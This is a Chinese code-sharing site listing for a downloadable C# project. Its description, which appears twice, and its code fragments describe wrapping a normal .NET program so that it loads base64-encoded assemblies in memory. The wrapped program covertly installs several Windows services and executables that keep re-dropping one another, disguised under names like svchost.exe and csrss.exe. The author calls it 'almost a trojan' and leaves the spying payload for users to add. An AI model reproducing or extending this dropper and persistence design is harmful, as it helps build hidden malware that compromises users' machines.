資源簡介
此程序僅做參考之用,不要運行里面的exe,否則后果自負。先看里面的說明。
此程序只使用C#編寫,功能是將一個正常的程序添加上其他操作。
將一些程序生成字符串,在一個程序里運行,差不多就是在內存里運行程序,
static void Main()
{
string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
Assembly asm_n = Assembly.Load(ns); //運行byte[]
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
這個程序需要執行的代碼都在 資源文件 里面。
運行Replica_Prg這個里面的,看到的是Normal_Soft的效果,同時背地里建立多個系統服務、釋放多個exe、exe和系統服務相互釋放。
因為只使用C#編寫,所以只能對.net編寫的exe進行轉碼運行。
可以包裝一個常用的.net的exe文件,在里面添加執行其他的.net的exe,差不多就是木馬。
此程序只是編譯過了,并沒有實際運行。
因為要刪除這個程序太惡心了,隔幾十秒就檢測釋放,多個系統服務和exe交互釋放。
為了便于刪除,沒檢測判斷每個服務是否被停掉,重啟。
為了便于刪除,生成的都在c:\temp里面,生成的可以起個好聽的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理員模式運行),自行修改,
功能沒寫,需要執行什么隱私功能自行添加,
有些可能忘寫判斷了,用try{}沒報錯,自己添加。
此程序只是編譯過了,并沒有實際運行檢測,可能有些邏輯環節沒執行到,或轉碼重復或有誤,自行修正。
程序只是說明性質的,如有興趣自己去運行、修改。
此程序只使用C#編寫,功能是將一個正常的程序添加上其他操作。
將一些程序生成字符串,在一個程序里運行,差不多就是在內存里運行程序,
static void Main()
{
string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
Assembly asm_n = Assembly.Load(ns); //運行byte[]
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
這個程序需要執行的代碼都在 資源文件 里面。
運行Replica_Prg這個里面的,看到的是Normal_Soft的效果,同時背地里建立多個系統服務、釋放多個exe、exe和系統服務相互釋放。
因為只使用C#編寫,所以只能對.net編寫的exe進行轉碼運行。
可以包裝一個常用的.net的exe文件,在里面添加執行其他的.net的exe,差不多就是木馬。
此程序只是編譯過了,并沒有實際運行。
因為要刪除這個程序太惡心了,隔幾十秒就檢測釋放,多個系統服務和exe交互釋放。
為了便于刪除,沒檢測判斷每個服務是否被停掉,重啟。
為了便于刪除,生成的都在c:\temp里面,生成的可以起個好聽的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理員模式運行),自行修改,
功能沒寫,需要執行什么隱私功能自行添加,
有些可能忘寫判斷了,用try{}沒報錯,自己添加。
此程序只是編譯過了,并沒有實際運行檢測,可能有些邏輯環節沒執行到,或轉碼重復或有誤,自行修正。
程序只是說明性質的,如有興趣自己去運行、修改。
代碼片段和文件信息
using?System;
using?System.Runtime.InteropServices;
using?System.Security.Principal;
namespace?ConsoleWithWindowsService
{
????class?Interop
????{
????????public?static?void?CreateProcess(string?app?string?path)
????????{
????????????bool?result;
????????????IntPtr?hToken?=?WindowsIdentity.GetCurrent().Token;
????????????IntPtr?hDupedToken?=?IntPtr.Zero;
????????????PROCESS_INFORMATION?pi?=?new?PROCESS_INFORMATION();
????????????SECURITY_ATTRIBUTES?sa?=?new?SECURITY_ATTRIBUTES();
????????????sa.Length?=?Marshal.SizeOf(sa);
????????????STARTUPINFO?si?=?new?STARTUPINFO();
????????????si.cb?=?Marshal.SizeOf(si);
????????????int?dwSessionID?=?WTSGetActiveConsoleSessionId();
????????????result?=?WTSQueryUserToken(dwSessionID?out?hToken);
????????????if?(!result)
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
????..A..H.?????41984??2017-10-01?00:54??Run_1\.vs\Run_1\v14\.suo
?????文件????????189??2017-09-30?23:30??Run_1\App.config
?????文件??????26112??2017-10-01?00:52??Run_1\bin\Debug\Run_1.exe
?????文件????????189??2017-09-30?23:30??Run_1\bin\Debug\Run_1.exe.config
?????文件??????17920??2017-10-01?00:52??Run_1\bin\Debug\Run_1.pdb
?????文件??????22696??2017-10-01?00:54??Run_1\bin\Debug\Run_1.vshost.exe
?????文件????????189??2017-09-30?23:30??Run_1\bin\Debug\Run_1.vshost.exe.config
?????文件????????490??2017-03-19?05:00??Run_1\bin\Debug\Run_1.vshost.exe.manifest
?????文件?????????42??2017-10-01?00:54??Run_1\obj\Debug\Run_1.csproj.FileListAbsolute.txt
?????文件????????957??2017-09-30?23:40??Run_1\Program.cs
?????文件???????1318??2017-09-30?23:30??Run_1\Properties\AssemblyInfo.cs
?????文件???????2823??2017-09-30?23:30??Run_1\Properties\Resources.Designer.cs
?????文件???????5612??2017-09-30?23:30??Run_1\Properties\Resources.resx
?????文件???????1092??2017-09-30?23:30??Run_1\Properties\Settings.Designer.cs
?????文件????????249??2017-09-30?23:30??Run_1\Properties\Settings.settings
?????文件???????4002??2017-09-30?23:35??Run_1\Run_1.csproj
?????文件????????976??2017-09-30?23:30??Run_1\Run_1.sln
?????文件???????3696??2017-09-30?23:35??Run_1\Service_Resource.Designer.cs
?????文件??????24331??2017-09-30?23:35??Run_1\Service_Resource.resx
????..A..H.?????40960??2017-10-01?00:56??Run_app\.vs\Run_app\v14\.suo
?????文件????????189??2017-09-30?20:18??Run_app\App.config
?????文件??????10240??2017-09-30?21:44??Run_app\bin\Debug\Run_app.exe
?????文件????????189??2017-09-30?20:18??Run_app\bin\Debug\Run_app.exe.config
?????文件??????15872??2017-09-30?21:44??Run_app\bin\Debug\Run_app.pdb
?????文件??????22696??2017-10-01?00:54??Run_app\bin\Debug\Run_app.vshost.exe
?????文件????????189??2017-09-30?20:18??Run_app\bin\Debug\Run_app.vshost.exe.config
?????文件???????3335??2017-09-30?20:20??Run_app\bin\Debug\Run_app.vshost.exe.manifest
?????文件?????????46??2017-10-01?00:54??Run_app\obj\Debug\Run_app.csproj.FileListAbsolute.txt
?????文件???????1559??2017-09-30?21:43??Run_app\Program.cs
?????文件???????3335??2017-09-30?20:20??Run_app\Properties\app.manifest
............此處省略191個文件信息
- 上一篇:開源的類庫DotNetCodes C#
- 下一篇:C# 播放音樂
評論
共有 條評論
川公網安備 51152502000135號